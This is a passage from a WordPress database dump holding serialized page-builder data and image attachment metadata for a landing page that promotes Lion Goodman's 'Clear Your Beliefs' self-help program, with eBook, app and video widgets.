(1063, 1561, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1068, 1565, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:199:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/head21.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1064, 1562, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1236:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:576:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1065, 1564, '_wp_attached_file', '2014/10/head21.jpg'),
(1066, 1564, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1024;s:6:"height";i:249;s:4:"file";s:18:"2014/10/head21.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"head21-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:17:"head21-300x72.jpg";s:5:"width";i:300;s:6:"height";i:72;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"head21-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:18:"head21-400x249.jpg";s:5:"width";i:400;s:6:"height";i:249;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:18:"head21-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:18:"head21-672x249.jpg";s:5:"width";i:672;s:6:"height";i:249;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyr